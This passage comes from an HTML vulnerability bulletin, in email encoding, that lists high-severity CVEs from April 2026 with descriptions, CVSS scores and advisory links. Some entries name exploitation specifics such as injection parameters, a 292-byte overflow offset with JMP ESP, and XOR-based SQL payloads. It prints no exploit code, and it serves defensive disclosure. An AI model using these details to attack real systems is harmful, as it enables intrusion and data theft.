of raw.apparmor and raw.qemu.conf when low level options are blocked</a><b= r>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Canonical--lxd</td>
<td>In Canonical LXD before 6.8, the backup import path validates project r= estrictions against backup/index.yaml in the supplied tar archive but creat=
es the instance from backup/container/backup.yaml, a separate file in the s= ame archive that is never checked against project restrictions. An authenti= cated remote attacker with instance-creation permission in a restricted pro= ject can craft a backup archive where backup.yaml carries restricted settin=
gs such as security.privileged=3Dtrue or raw.lxc directives, bypassing all = project restriction enforcement and allowing full host compromise.</td> <td>2026-04-09</td>
<td>9.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34178" target=3D= "_blank" rel=3D"noopener">CVE-2026-34178</a></td>

<a href=3D"https://github.com/canonical/lxd/security/advisories/GHSA-q96j-3= fmm-7fv4" target=3D"_blank" rel=3D"noopener">Importing a crafted backup lea=
ds to project restriction bypass</a><br><a href=3D"https://github.com/canon= ical/lxd/pull/17921" target=3D"_blank" rel=3D"noopener">Import: Create back=
up config from index</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Canonical--lxd</td>
<td>In Canonical LXD versions 4.12 through 6.7, the doCertificateUpdate fun= ction in lxd/certificates.go does not validate the Type field when handling=
PUT/PATCH requests to /1.0/certificates/{fingerprint} for restricted TLS c= ertificate users, allowing a remote authenticated attacker to escalate priv= ileges to cluster admin.</td>
<td>2026-04-09</td>
<td>9.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34179" target=3D= "_blank" rel=3D"noopener">CVE-2026-34179</a></td>

<a href=3D"https://github.com/canonical/lxd/security/advisories/GHSA-c3h3-8= 9qf-jqm5" target=3D"_blank" rel=3D"noopener">Update of type field in restri= cted TLS certificate allows privilege escalation to cluster admin</a><br><a=
href=3D"https://github.com/canonical/lxd/pull/17936" target=3D"_blank" rel= =3D"noopener">Improve validation on certificate edit</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Nextendweb--Smart Slider 3 Pro for WordPress</=

<td>Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a=
multi-stage remote access toolkit injected through a compromised update sy= stem that allows unauthenticated attackers to execute arbitrary code and co= mmands. Attackers can trigger pre-authentication remote shell execution via=
HTTP headers, establish authenticated backdoors accepting arbitrary PHP co=
de or OS commands, create hidden administrator accounts, exfiltrate credent= ials and access keys, and maintain persistence through multiple injection p= oints including must-use plugins and core file modifications.</td> <td>2026-04-09</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34424" target=3D= "_blank" rel=3D"noopener">CVE-2026-34424</a></td>

<a href=3D"https://smartslider.helpscoutdocs.com/article/2144-wordpress-sec= urity-advisory-smart-slider-3-pro-3-5-1-35-compromise" target=3D"_blank" re= l=3D"noopener">https://smartslider.helpscoutdocs.com/article/2144-wordpress= -security-advisory-smart-slider-3-pro-3-5-1-35-compromise</a><br><a href=3D= "https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisor= y-smart-slider-3-pro-3-5-1-35-compromise" target=3D"_blank" rel=3D"noopener= ">https://smartslider.helpscoutdocs.com/article/2143-joomla-security-adviso= ry-smart-slider-3-pro-3-5-1-35-compromise</a><br><a href=3D"https://patchst= ack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/w= ordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability" target=3D"_= blank" rel=3D"noopener">https://patchstack.com/database/wordpress/plugin/ne= xtend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1= -35-backdoor-vulnerability</a><br><a href=3D"https://patchstack.com/article= s/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analy= sis/" target=3D"_blank" rel=3D"noopener">https://patchstack.com/articles/cr= itical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/= </a><br><a href=3D"https://mysites.guru/blog/smart-slider-3-pro-supply-chai= n-compromise/" target=3D"_blank" rel=3D"noopener">https://mysites.guru/blog= /smart-slider-3-pro-supply-chain-compromise/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">usebruno--bruno</td>
<td>Bruno is an open source IDE for exploring and testing APIs. Prior to 3.= 2.1, Bruno was affected by a supply chain attack involving compromised vers= ions of the axios npm package, which introduced a hidden dependency deployi=
ng a cross-platform Remote Access Trojan (RAT). Users of @usebruno/cli who = ran npm install between 00:21 UTC and ~03:30 UTC on March 31, 2026 may have=
been impacted. Upgrade to 3.2.1</td>
<td>2026-04-06</td>
<td>9.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34841" target=3D= "_blank" rel=3D"noopener">CVE-2026-34841</a></td>

<a href=3D"https://github.com/usebruno/bruno/security/advisories/GHSA-658g-= p7jg-wx5g" target=3D"_blank" rel=3D"noopener">https://github.com/usebruno/b= runo/security/advisories/GHSA-658g-p7jg-wx5g</a><br><a href=3D"https://gith= ub.com/axios/axios/issues/10604" target=3D"_blank" rel=3D"noopener">https:/= /github.com/axios/axios/issues/10604</a><br><a href=3D"https://github.com/u= sebruno/bruno/pull/7632" target=3D"_blank" rel=3D"noopener">https://github.= com/usebruno/bruno/pull/7632</a><br><a href=3D"https://www.aikido.dev/blog/= axios-npm-compromised-maintainer-hijacked-rat" target=3D"_blank" rel=3D"noo= pener">https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacke= d-rat</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">R-Project--RGui</td>
<td>RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI pr= eferences dialog that allows attackers to bypass DEP protections through st= ructured exception handling exploitation. Attackers can craft malicious inp=
ut in the Language for menus and messages field to trigger a stack-based bu= ffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve=
arbitrary code execution.</td>
<td>2026-04-12</td>
<td>8.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2018-25258" target=3D= "_blank" rel=3D"noopener">CVE-2018-25258</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46107" target=3D"_blank" rel= =3D"noopener">ExploitDB-46107</a><br><a href=3D"https://www.r-project.org/"=
target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a hre= f=3D"https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe"=
target=3D"_blank" rel=3D"noopener">Product Reference</a><br><a href=3D"htt= ps://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass=
" target=3D"_blank" rel=3D"noopener">VulnCheck Advisory: RGui 3.5.0 Local B= uffer Overflow SEH DEP Bypass</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Html5Videoplayer--HTML5 Video Player</td> <td>HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability=
that allows attackers to execute arbitrary code by supplying an oversized = key code string. Attackers can craft a malicious payload exceeding 997 byte=
s and paste it into the KEY CODE field in the Help Register dialog to trigg=
er code execution and spawn a calculator process.</td>
<td>2026-04-12</td>
<td>8.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25689" target=3D= "_blank" rel=3D"noopener">CVE-2019-25689</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46279" target=3D"_blank" rel= =3D"noopener">ExploitDB-46279</a><br><a href=3D"http://www.html5videoplayer= .net/download.html" target=3D"_blank" rel=3D"noopener">Official Product Hom= epage</a><br><a href=3D"https://www.vulncheck.com/advisories/html5-video-pl= ayer-local-buffer-overflow-non-seh" target=3D"_blank" rel=3D"noopener">Vuln= Check Advisory: HTML5 Video Player 1.2.5 Local Buffer Overflow Non-SEH</a><= br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Faleemi--Faleemi Desktop Software</td>
<td>Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerabi= lity in the System Setup dialog that allows attackers to bypass DEP protect= ions through structured exception handling exploitation. Attackers can inje=
ct a crafted payload into the Save Path for Snapshot and Record file field =
to trigger a buffer overflow and execute arbitrary code via ROP chain gadge= ts.</td>
<td>2026-04-12</td>
<td>8.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25691" target=3D= "_blank" rel=3D"noopener">CVE-2019-25691</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46269" target=3D"_blank" rel= =3D"noopener">ExploitDB-46269</a><br><a href=3D"https://www.faleemi.com/" t= arget=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href= =3D"https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buf= fer-overflow-seh-dep-bypass" target=3D"_blank" rel=3D"noopener">VulnCheck A= dvisory: Faleemi Desktop Software 1.8 Local Buffer Overflow SEH DEP Bypass<= /a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">r-project--R</td>
<td>R 3.4.4 contains a local buffer overflow vulnerability that allows atta= ckers to execute arbitrary code by injecting malicious input into the GUI P= references language field. Attackers can craft a payload with a 292-byte of= fset and JMP ESP instruction to execute commands like calc.exe when the pay= load is pasted into the Language for menus and messages field.</td> <td>2026-04-12</td>
<td>8.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25695" target=3D= "_blank" rel=3D"noopener">CVE-2019-25695</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46265" target=3D"_blank" rel= =3D"noopener">ExploitDB-46265</a><br><a href=3D"https://cloud.r-project.org= /bin/windows/" target=3D"_blank" rel=3D"noopener">Official Product Homepage= </a><br><a href=3D"https://www.vulncheck.com/advisories/r-local-buffer-over= flow-windows-xp-sp3" target=3D"_blank" rel=3D"noopener">VulnCheck Advisory:=
R 3.4.4 Local Buffer Overflow Windows XP SP3</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">VictorAlagwu--CMSsite</td>
<td>CMSsite 1.0 contains an SQL injection vulnerability that allows unauthe= nticated attackers to manipulate database queries by injecting SQL code thr= ough the cat_id parameter. Attackers can send GET requests to category.php = with malicious cat_id values to extract sensitive database information incl= uding usernames and credentials.</td>
<td>2026-04-12</td>
<td>8.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25697" target=3D= "_blank" rel=3D"noopener">CVE-2019-25697</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46259" target=3D"_blank" rel= =3D"noopener">ExploitDB-46259</a><br><a href=3D"https://github.com/VictorAl= agwu/CMSsite/archive/master.zip" target=3D"_blank" rel=3D"noopener">Product=
Reference</a><br><a href=3D"https://www.vulncheck.com/advisories/cmssite-s= ql-injection-via-category-php" target=3D"_blank" rel=3D"noopener">VulnCheck=
Advisory: CMSsite 1.0 SQL Injection via category.php</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Divxtodvd--Easy Video to iPod Converter</td> <td>Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vu= lnerability in the user registration field that allows local attackers to o= verwrite the structured exception handler. Attackers can input a crafted pa= yload exceeding 996 bytes in the username field to trigger SEH overwrite an=
d execute arbitrary code with user privileges.</td>
<td>2026-04-12</td>
<td>8.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25701" target=3D= "_blank" rel=3D"noopener">CVE-2019-25701</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46255" target=3D"_blank" rel= =3D"noopener">ExploitDB-46255</a><br><a href=3D"http://www.divxtodvd.net/" = target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href= =3D"http://www.divxtodvd.net/easy_video_to_ipod.exe" target=3D"_blank" rel= =3D"noopener">Product Reference</a><br><a href=3D"https://www.vulncheck.com= /advisories/easy-video-to-ipod-converter-local-buffer-overflow-seh" target= =3D"_blank" rel=3D"noopener">VulnCheck Advisory: Easy Video to iPod Convert=
er 1.6.20 Local Buffer Overflow SEH</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Sourceforge--Echo Mirage</td>
<td>Echo Mirage 3.1 contains a stack buffer overflow vulnerability that all= ows local attackers to crash the application or execute arbitrary code by s= upplying an oversized string in the Rules action field. Attackers can creat=
e a malicious text file with a crafted payload exceeding buffer boundaries = and paste it into the action field through the Rules dialog to trigger the = overflow and overwrite the return address.</td>
<td>2026-04-12</td>
<td>8.4</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25705" target=3D= "_blank" rel=3D"noopener">CVE-2019-25705</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46216" target=3D"_blank" rel= =3D"noopener">ExploitDB-46216</a><br><a href=3D"http://initd.sh/" target=3D= "_blank" rel=3D"noopener">Official Product Homepage</a><br><a href=3D"https= ://sourceforge.net/projects/echomirage.oldbutgold.p/" target=3D"_blank" rel= =3D"noopener">Product Reference</a><br><a href=3D"https://www.vulncheck.com= /advisories/echo-mirage-stack-buffer-overflow-via-rules-action-field" targe= t=3D"_blank" rel=3D"noopener">VulnCheck Advisory: Echo Mirage 3.1 Stack Buf= fer Overflow via Rules Action Field</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Dolibarr--Dolibarr ERP-CRM</td>
<td>Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the r= owid parameter of the admin dict.php endpoint that allows attackers to exec= ute arbitrary SQL queries. Attackers can inject malicious SQL code through = the rowid POST parameter to extract sensitive database information using er= ror-based SQL injection techniques.</td>
<td>2026-04-12</td>
<td>8.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2019-25710" target=3D= "_blank" rel=3D"noopener">CVE-2019-25710</a></td>

<a href=3D"https://www.exploit-db.com/exploits/46095" target=3D"_blank" rel= =3D"noopener">ExploitDB-46095</a><br><a href=3D"https://www.dolibarr.org/" = target=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href= =3D"https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/8.0.= 4/dolibarr-8.0.4.zip" target=3D"_blank" rel=3D"noopener">Product Reference<= /a><br><a href=3D"https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql= -injection-via-rowid-parameter" target=3D"_blank" rel=3D"noopener">VulnChec=
k Advisory: Dolibarr ERP-CRM 8.0.4 SQL Injection via rowid Parameter</a><br= >=C2=A0</td>
</tr>

<td class=3D"vendor-product">Synology--Synology SSL VPN Client</td>
<td>A plaintext storage of a password vulnerability in Synology SSL VPN Cli= ent before 1.4.5-0684 allows remote attackers to access or influence the us= er's PIN code due to insecure storage. This may lead to unauthorized VPN co= nfiguration and potential interception of subsequent VPN traffic when combi= ned with user interaction.</td>
<td>2026-04-10</td>
<td>8.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2021-47961" target=3D= "_blank" rel=3D"noopener">CVE-2021-47961</a></td>

<a href=3D"https://www.synology.com/en-global/security/advisory/Synology_SA= _26_05" target=3D"_blank" rel=3D"noopener">Synology-SA-26:05 Synology SSL V=
PN Client</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Adivaha--WordPress adivaha Travel Plugin</td> <td>WordPress adivaha Travel Plugin 2.3 contains a time-based blind SQL inj= ection vulnerability that allows unauthenticated attackers to manipulate da= tabase queries by injecting SQL code through the 'pid' GET parameter. Attac= kers can send requests to the /mobile-app/v3/ endpoint with crafted 'pid' v= alues using XOR-based payloads to extract sensitive database information or=
cause denial of service.</td>
<td>2026-04-09</td>
<td>8.2</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2023-54359" target=3D= "_blank" rel=3D"noopener">CVE-2023-54359</a></td>

<a href=3D"https://www.exploit-db.com/exploits/51655" target=3D"_blank" rel= =3D"noopener">ExploitDB-51655</a><br><a href=3D"https://www.adivaha.com/" t= arget=3D"_blank" rel=3D"noopener">Official Product Homepage</a><br><a href= =3D"https://wordpress.org/plugins/adiaha-hotel/" target=3D"_blank" rel=3D"n= oopener">Product Reference</a><br><a href=3D"https://www.vulncheck.com/advi= sories/wordpress-adivaha-travel-plugin-sql-injection-via-pid" target=3D"_bl= ank" rel=3D"noopener">VulnCheck Advisory: WordPress adivaha Travel Plugin 2=
.3 SQL Injection via pid</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Juniper Networks--Apstra</td>
<td>A Key Exchange without Entity Authentication vulnerability in the SSH i= mplementation of Juniper Networks Apstra allows a unauthenticated, MITM att= acker to impersonate managed devices. Due to insufficient SSH host key vali= dation an attacker can perform a machine-in-the-middle attack on the SSH co= nnections from Apstra to managed devices, enabling an attacker to impersona=
te a managed device and capture user credentials. This issue affects all ve= rsions of=C2=A0Apstra before 6.1.1.</td>
<td>2026-04-09</td>
<td>8.7</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-13914" target=3D= "_blank" rel=3D"noopener">CVE-2025-13914</a></td>

<a href=3D"https://kb.juniper.net/JSA107862" target=3D"_blank" rel=3D"noope= ner">https://kb.juniper.net/JSA107862</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Qualcomm, Inc.--Snapdragon</td>
<td>Memory corruption when decoding corrupted satellite data files with inv= alid signature offsets.</td>
<td>2026-04-06</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-47392" target=3D= "_blank" rel=3D"noopener">CVE-2025-47392</a></td>

<a href=3D"https://docs.qualcomm.com/product/publicresources/securitybullet= in/april-2026-bulletin.html" target=3D"_blank" rel=3D"noopener">https://doc= s.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin= .html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">CactusThemes--VideoPro</td>
<td>Improper Control of Filename for Include/Require Statement in PHP Progr=
am ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro all= ows PHP Local File Inclusion.This issue affects VideoPro: from n/a through = 2.3.8.1.</td>
<td>2026-04-10</td>
<td>8.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-58913" target=3D= "_blank" rel=3D"noopener">CVE-2025-58913</a></td>

<a href=3D"https://patchstack.com/database/wordpress/theme/videopro/vulnera= bility/wordpress-videopro-theme-2-3-8-1-local-file-inclusion-vulnerability?= _s_id=3Dcve" target=3D"_blank" rel=3D"noopener">https://patchstack.com/data= base/wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-= 1-local-file-inclusion-vulnerability?_s_id=3Dcve</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Hitachi--JP1/IT Desktop Management 2 - Manager= </td>
<td>Remote Code Execution Vulnerability=C2=A0in JP1/IT Desktop Management 2=
- Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on=
Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Win= dows, JP1/IT Desktop Management - Manager on Windows, Job Management Partne=
r 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Wind= ows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distr= ibution Manager on Windows, Job Management Partner 1/Software Distribution = Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager:=
from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before = 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-6=
0 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2=
- Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11= -04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 bef= ore 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job = Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through = 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16;=
Job Management Partner 1/IT Desktop Management - Manager: from 09-50 throu=
gh 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM = Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Dist= ribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Sof= tware Distribution Client: from 09-00 through 09-51-13.</td> <td>2026-04-07</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-65115" target=3D= "_blank" rel=3D"noopener">CVE-2025-65115</a></td>

<a href=3D"https://www.hitachi.com/products/it/software/security/info/vuls/= hitachi-sec-2026-118/index.html" target=3D"_blank" rel=3D"noopener">https:/= /www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-1= 18/index.html</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">IBM--Verify Identity Access Container</td>
<td>IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Securi=
ty Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Ac= cess 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9=
.1 could allow a locally authenticated user to execute malicious scripts fr=
om outside of its control sphere.</td>
<td>2026-04-07</td>
<td>8.5</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1342" target=3D"= _blank" rel=3D"noopener">CVE-2026-1342</a></td>

<a href=3D"https://www.ibm.com/support/pages/node/7268253" target=3D"_blank=
" rel=3D"noopener">https://www.ibm.com/support/pages/node/7268253</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">LibRaw--LibRaw</td>
<td>An integer overflow vulnerability exists in the deflate_dng_load_raw fu= nctionality of LibRaw Commit 8dc68e2. A specially crafted malicious file ca=
n lead to a heap buffer overflow. An attacker can provide a malicious file =
to trigger this vulnerability.</td>
<td>2026-04-07</td>
<td>8.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20884" target=3D= "_blank" rel=3D"noopener">CVE-2026-20884</a></td>

<a href=3D"https://talosintelligence.com/vulnerability_reports/TALOS-2026-2= 364" target=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulne= rability_reports/TALOS-2026-2364</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Windmill Labs--Windmill CE (Community Edition)= </td>
<td>Windmill versions 1.56.0 through 1.614.0 contain a missing authorizatio=
n vulnerability that allows users with the Operator role to perform prohibi= ted entity creation and modification actions via the backend API. Although = Operators are documented and priced as unable to create or modify entities,=
the API does not enforce the Operator restriction on workspace endpoints, = allowing an Operator to create and update scripts, flows, apps, and raw_app=
s. Since Operators can also execute scripts via the jobs API, this allows d= irect privilege escalation to remote code execution within the Windmill dep= loyment. This vulnerability has existed since the introduction of the Opera= tor role in version 1.56.0.</td>
<td>2026-04-07</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22683" target=3D= "_blank" rel=3D"noopener">CVE-2026-22683</a></td>

<a href=3D"https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmil= l-rce/" target=3D"_blank" rel=3D"noopener">https://chocapikk.com/posts/2026= /windfall-nextcloud-flow-windmill-rce/</a><br><a href=3D"https://github.com= /Chocapikk/Windfall" target=3D"_blank" rel=3D"noopener">https://github.com/= Chocapikk/Windfall</a><br><a href=3D"https://github.com/windmill-labs/windm= ill/releases/tag/v1.615.0" target=3D"_blank" rel=3D"noopener">https://githu= b.com/windmill-labs/windmill/releases/tag/v1.615.0</a><br><a href=3D"https:= //github.com/windmill-labs/windmill/commit/c621a74804f4f6e8318819c01e3a23a1= 7698588b" target=3D"_blank" rel=3D"noopener">https://github.com/windmill-la= bs/windmill/commit/c621a74804f4f6e8318819c01e3a23a17698588b</a><br><a href= =3D"https://www.windmill.dev/" target=3D"_blank" rel=3D"noopener">https://w= ww.windmill.dev/</a><br><a href=3D"https://apps.nextcloud.com/apps/flow/rel= eases" target=3D"_blank" rel=3D"noopener">https://apps.nextcloud.com/apps/f= low/releases</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to 1.11.38, there is=
a path traversal in main/exercise/savescores.php leading to arbitrary file=
feletion. User input from $_REQUEST['test'] is concatenated directly into = filesystem path without canonicalization or traversal checks. This vulnerab= ility is fixed in 1.11.38.</td>
<td>2026-04-10</td>
<td>8.3</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-31939" target=3D= "_blank" rel=3D"noopener">CVE-2026-31939</a></td>

<a href=3D"https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-= 8q8c-v75x-q2hx" target=3D"_blank" rel=3D"noopener">https://github.com/chami= lo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx</a><br><a href=3D"ht= tps://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035= 800abae78" target=3D"_blank" rel=3D"noopener">https://github.com/chamilo/ch= amilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78</a><br><a href=3D= "https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38" target=3D"_b= lank" rel=3D"noopener">https://github.com/chamilo/chamilo-lms/releases/tag/= v1.11.38</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">danbilabs--Advanced Members for ACF</td>
<td>The Advanced Members for ACF plugin for WordPress is vulnerable to arbi= trary file deletion due to insufficient file path validation in the create_= crop function in all versions up to, and including, 1.2.5. This makes it po= ssible for authenticated attackers, with Subscriber-level access and above,=
to delete arbitrary files on the server, which can easily lead to remote c= ode execution when the right file is deleted (such as wp-config.php). The v= ulnerability was partially patched in version 1.2.5.</td>
<td>2026-04-08</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3243" target=3D"= _blank" rel=3D"noopener">CVE-2026-3243</a></td>

<a href=3D"https://www.wordfence.com/threat-intel/vulnerabilities/id/22b633= 69-c6ea-42e9-bea3-d15837da7732?source=3Dcve" target=3D"_blank" rel=3D"noope= ner">https://www.wordfence.com/threat-intel/vulnerabilities/id/22b63369-c6e= a-42e9-bea3-d15837da7732?source=3Dcve</a><br><a href=3D"https://plugins.tra= c.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avat= ar.php#L57" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpre= ss.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L5= 7</a><br><a href=3D"https://plugins.trac.wordpress.org/browser/advanced-mem= bers/tags/1.2.4/core/modules/class-avatar.php#L266" target=3D"_blank" rel= =3D"noopener">https://plugins.trac.wordpress.org/browser/advanced-members/t= ags/1.2.4/core/modules/class-avatar.php#L266</a><br><a href=3D"https://plug= ins.trac.wordpress.org/browser/advanced-members/trunk/core/modules/class-av= atar.php#L710" target=3D"_blank" rel=3D"noopener">https://plugins.trac.word= press.org/browser/advanced-members/trunk/core/modules/class-avatar.php#L710= </a><br><a href=3D"https://plugins.trac.wordpress.org/changeset/3479725/" t= arget=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpress.org/change= set/3479725/</a><br><a href=3D"https://plugins.trac.wordpress.org/changeset= /3492372/" target=3D"_blank" rel=3D"noopener">https://plugins.trac.wordpres= s.org/changeset/3492372/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Elastic--Logstash</td>
<td>Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in=
Logstash can lead to arbitrary file write and potentially remote code exec= ution via Relative Path Traversal (CAPEC-139). The archive extraction utili= ties used by Logstash do not properly validate file paths within compressed=
archives. An attacker who can serve a specially crafted archive to Logstas=
h through a compromised or attacker-controlled update endpoint can write ar= bitrary files to the host filesystem with the privileges of the Logstash pr= ocess. In certain configurations where automatic pipeline reloading is enab= led, this can be escalated to remote code execution.</td>
<td>2026-04-08</td>
<td>8.1</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33466" target=3D= "_blank" rel=3D"noopener">CVE-2026-33466</a></td>

<a href=3D"https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-securi= ty-update-esa-2026-29/385816" target=3D"_blank" rel=3D"noopener">https://di= scuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-update-esa-2026-29= /385816</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">homarr-labs--homarr</td>
<td>Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-= Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/lo= gin page. The application improperly trusts a URL parameter (callbackUrl), = which is passed to redirect and router.push. An attacker can craft a malici= ous link that, when opened by an authenticated user, performs a client-side=
redirect and executes arbitrary JavaScript in the context of their browser=
. This could lead to credential theft, internal network pivoting, and unaut= horized actions performed on behalf of the victim. This vulnerability is fi= xed in 1.57.0.</td>
<td>2026-04-06</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-33510" target=3D= "_blank" rel=3D"noopener">CVE-2026-33510</a></td>

<a href=3D"https://github.com/homarr-labs/homarr/security/advisories/GHSA-7= 9pg-554g-rw82" target=3D"_blank" rel=3D"noopener">https://github.com/homarr= -labs/homarr/security/advisories/GHSA-79pg-554g-rw82</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">IBM--Langflow Desktop</td>
<td>IBM Langflow Desktop 1.6.0 through 1.8.2 Langflow could allow an authen= ticated user to execute arbitrary code on the system, caused by an insecure=
default setting which permits the deserialization of untrusted data in the=
FAISS component.</td>
<td>2026-04-08</td>
<td>8.8</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3357" target=3D"= _blank" rel=3D"noopener">CVE-2026-3357</a></td>

<a href=3D"https://www.ibm.com/support/pages/node/7268428" target=3D"_blank=
" rel=3D"noopener">https://www.ibm.com/support/pages/node/7268428</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">chamilo--chamilo-lms</td>
<td>Chamilo LMS is a learning management system. Prior to .0.0-RC.3, the Pl= atformConfigurationController::decodeSettingArray() method uses PHP's eval(=
